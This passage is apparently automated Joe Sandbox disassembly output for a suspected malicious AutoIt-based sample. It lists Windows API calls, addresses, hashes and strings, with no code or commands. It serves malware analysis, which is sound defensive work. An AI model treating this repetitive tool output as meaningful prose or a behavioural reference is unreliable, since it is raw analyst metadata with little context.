                                                  • Instruction ID: d5112a5ee3ea39cd1cd44699589949e5ecf925adbe846af733b3072632623b9b
                                                  • Opcode Fuzzy Hash: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
                                                  • Instruction Fuzzy Hash: DA617BB0914289AFDB21CF65CC88EAE7BBCFB42314F140569E841E3251D771AE45EB21
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00907214
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00907217
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090723B
                                                  • _memset.LIBCMT ref: 0090724C
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0090725E
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009072D6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                                                  • Instruction ID: e6b6130be04ddebd3909d8a120709c0ecb6c212a5acd6819652d23f7c0782652
                                                  • Opcode Fuzzy Hash: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                                                  • Instruction Fuzzy Hash: F5616BB5904208AFDB20DFA4CC81EEEB7F8EB09710F140159FA14E72E1D774A945DB60
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008D7135
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 008D718E
                                                  • VariantInit.OLEAUT32(?), ref: 008D71A0
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 008D71C0
                                                  • VariantCopy.OLEAUT32(?,?), ref: 008D7213
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 008D7227
                                                  • VariantClear.OLEAUT32(?), ref: 008D723C
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 008D7249
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D7252
                                                  • VariantClear.OLEAUT32(?), ref: 008D7264
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D726F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                                                  • Instruction ID: d87fa5867b27f14c88e9e6debffdb103b8eb5a2f20a644a9b034fdb87cfb9457
                                                  • Opcode Fuzzy Hash: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                                                  • Instruction Fuzzy Hash: 234163319042199FCF10DFA8D898DAEBBB9FF08354F008166F956E7361DB30AA45CB91
                                                  APIs
                                                  • WSAStartup.WS2_32(00000101,?), ref: 008F5AA6
                                                  • inet_addr.WS2_32(?), ref: 008F5AEB
                                                  • gethostbyname.WS2_32(?), ref: 008F5AF7
                                                  • IcmpCreateFile.IPHLPAPI ref: 008F5B05
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B75
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B8B
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008F5C00
                                                  • WSACleanup.WS2_32 ref: 008F5C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: e7dd1f8ef9eaddd9b595b40395644a7f1a123b6ddb8bfbb966e80b995d8a44f8
                                                  • Instruction ID: 5dc7f4b63e8272bf8c0498806164b4b5ae6d3f04d8588239c6f1d93d4b0ed838
                                                  • Opcode Fuzzy Hash: e7dd1f8ef9eaddd9b595b40395644a7f1a123b6ddb8bfbb966e80b995d8a44f8
                                                  • Instruction Fuzzy Hash: FE518F316047049FD720AF24CC59B3AB7E4FF48720F148929F696DB2A1DB70E9009B42
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EB73B
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008EB7B1
                                                  • GetLastError.KERNEL32 ref: 008EB7BB
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 008EB828
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: b397a285e262d3db3f3fe3a5608976eb9f67ffbc716ee6a325dac87b3a4eeb7e
                                                  • Instruction ID: 00a4c44529710d16c2b558d98fad583b4c5e3409b28803a022c671fb396f90fb
                                                  • Opcode Fuzzy Hash: b397a285e262d3db3f3fe3a5608976eb9f67ffbc716ee6a325dac87b3a4eeb7e
                                                  • Instruction Fuzzy Hash: 8931C435A00248AFDB10EF69CC85ABF7BB4FF8A754F144029E541D7291DB719E42CB51
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008D94F6
                                                  • GetDlgCtrlID.USER32 ref: 008D9501
                                                  • GetParent.USER32 ref: 008D951D
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9520
                                                  • GetDlgCtrlID.USER32(?), ref: 008D9529
                                                  • GetParent.USER32(?), ref: 008D9545
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9548
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: a4d6ca88bf7eaf9a977470965fb6f6a41a5a428198b83eca00724cd7f0482efa
                                                  • Instruction ID: 6a5a75792bf2588004e7708a4034939a358a191508e9667f41ee096aa312bac7
                                                  • Opcode Fuzzy Hash: a4d6ca88bf7eaf9a977470965fb6f6a41a5a428198b83eca00724cd7f0482efa
                                                  • Instruction Fuzzy Hash: 5321B075904208AFCF05AF64CC95EFEBBB5FF49310F10022AF961972A2DB7599199B20
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008D95DF
                                                  • GetDlgCtrlID.USER32 ref: 008D95EA
                                                  • GetParent.USER32 ref: 008D9606
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9609
                                                  • GetDlgCtrlID.USER32(?), ref: 008D9612
                                                  • GetParent.USER32(?), ref: 008D962E
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9631
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 1204e2100e87361eda5c727108b593bca3f0fe439edf05ca0b7b125b08a3d63e
                                                  • Instruction ID: afdf39119a09edbed9e2562d2a1b325d52e587bdb5b364c5e797ad55fc36fccb
                                                  • Opcode Fuzzy Hash: 1204e2100e87361eda5c727108b593bca3f0fe439edf05ca0b7b125b08a3d63e
                                                  • Instruction Fuzzy Hash: 1721A175900208BFDF15AB64CC95EFEBBB8FF58300F100216F951D72A1DB7599199B21
                                                  APIs
                                                  • GetParent.USER32 ref: 008D9651
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 008D9666
                                                  • _wcscmp.LIBCMT ref: 008D9678
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008D96F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                                                  • Instruction ID: c65918f3e0a9594de0809639e78f1b3661dcbf9adfeec127ed049cff0da6e6fa
                                                  • Opcode Fuzzy Hash: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                                                  • Instruction Fuzzy Hash: 2C113A37248307BAFA112624EC06DA6779CEB11328F200227FD00E15D1FE92E9415A49
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 008F8BEC
                                                  • CoInitialize.OLE32(00000000), ref: 008F8C19
                                                  • CoUninitialize.OLE32 ref: 008F8C23
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 008F8D23
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 008F8E50
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00912C0C), ref: 008F8E84
                                                  • CoGetObject.OLE32(?,00000000,00912C0C,?), ref: 008F8EA7
                                                  • SetErrorMode.KERNEL32(00000000), ref: 008F8EBA
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008F8F3A
                                                  • VariantClear.OLEAUT32(?), ref: 008F8F4A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: b88a9ee749d8f6a40391a2b6e5c8c3e18991192018a65c30e356f90ce9a5de89
                                                  • Instruction ID: b3d0c2cae04e20e4fbef0a617bf453e1b1a94d699624383e03120f0be2a84e6e
                                                  • Opcode Fuzzy Hash: b88a9ee749d8f6a40391a2b6e5c8c3e18991192018a65c30e356f90ce9a5de89
                                                  • Instruction Fuzzy Hash: 75C1E071208309AFD700EF68C88496AB7E9FF89748F04495DFA8ADB251DB71ED05CB52
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 008E419D
                                                  • __swprintf.LIBCMT ref: 008E41AA
                                                    • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 008E41D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 008E41E0
                                                  • LockResource.KERNEL32(00000000), ref: 008E41ED
                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 008E420D
                                                  • LoadResource.KERNEL32(?,00000000), ref: 008E421F
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 008E422E
                                                  • LockResource.KERNEL32(?), ref: 008E423A
                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008E429B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                  • String ID:
                                                  • API String ID: 1433390588-0
                                                  • Opcode ID: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                                                  • Instruction ID: 45a0c5cea0a4917b7c5aced80bf63654cc5ec8f479f4965402c35acce244c1d6
                                                  • Opcode Fuzzy Hash: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                                                  • Instruction Fuzzy Hash: 2C31EF71A0924AAFDB109FA1DC58EBF7BACFF0A301F004425FA19D6550E730DA11EBA0
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,008E0778,?,00000001), ref: 008E1700
                                                  • GetForegroundWindow.USER32 ref: 008E1714
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 008E171B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E172A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E173C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E1755
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 008E1767
                                                  • AttachThreadInput.USER32(00000000,00000000), ref: 008E17AC
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008E17C1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008E17CC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                                                  • Instruction ID: 426421599284a130d2acc78f2d87875ed43f7c7016fa45876e0ce0be6d3e9c67
                                                  • Opcode Fuzzy Hash: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                                                  • Instruction Fuzzy Hash: 4431BF79628248BFEF21DF55DC88F69BBA9FB1BB55F104064F800C62A0DB709E449B60
                                                  APIs
                                                  • EnumChildWindows.USER32(?,008DAA64), ref: 008DA9A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 0c4d9ea9e0d6b246cf28d2dcb593268f5675c17fa1adca492c32eab79c6128e0
                                                  • Instruction ID: 4e2dc925223ff7dd897ef04362fd6a0816411f6cc4c8ade22bb07fda97d70933
                                                  • Opcode Fuzzy Hash: 0c4d9ea9e0d6b246cf28d2dcb593268f5675c17fa1adca492c32eab79c6128e0
                                                  • Instruction Fuzzy Hash: 2F91A47150060AEADB1CDF64C491BE9FB75FF04304F608226E899E7741DF30AA59CB92
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00882EAE
                                                    • Part of subcall function 00881DB3: GetClientRect.USER32(?,?), ref: 00881DDC
                                                    • Part of subcall function 00881DB3: GetWindowRect.USER32(?,?), ref: 00881E1D
                                                    • Part of subcall function 00881DB3: ScreenToClient.USER32(?,?), ref: 00881E45
                                                  • GetDC.USER32 ref: 008BCF82
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BCF95
                                                  • SelectObject.GDI32(00000000,00000000), ref: 008BCFA3
                                                  • SelectObject.GDI32(00000000,00000000), ref: 008BCFB8
                                                  • ReleaseDC.USER32(?,00000000), ref: 008BCFC0
                                                  • MoveWindow.USER32(?,?,?,?,?,?), ref: 008BD04B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                                                  • Instruction ID: 555e702abba64fdd958d062918b729e51e61bb607a8663d9c17df22b1d660a8b
                                                  • Opcode Fuzzy Hash: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                                                  • Instruction Fuzzy Hash: 8C71D431500209EFCF21AF64C884AFA7BB6FF49364F1442A9ED55DA3A6D7318C42DB61
                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                                  • RegisterClassExW.USER32(00000030), ref: 0088309E
                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                                  • LoadIconW.USER32(000000A9), ref: 008830F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 975902462-1005189915
                                                  • Opcode ID: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
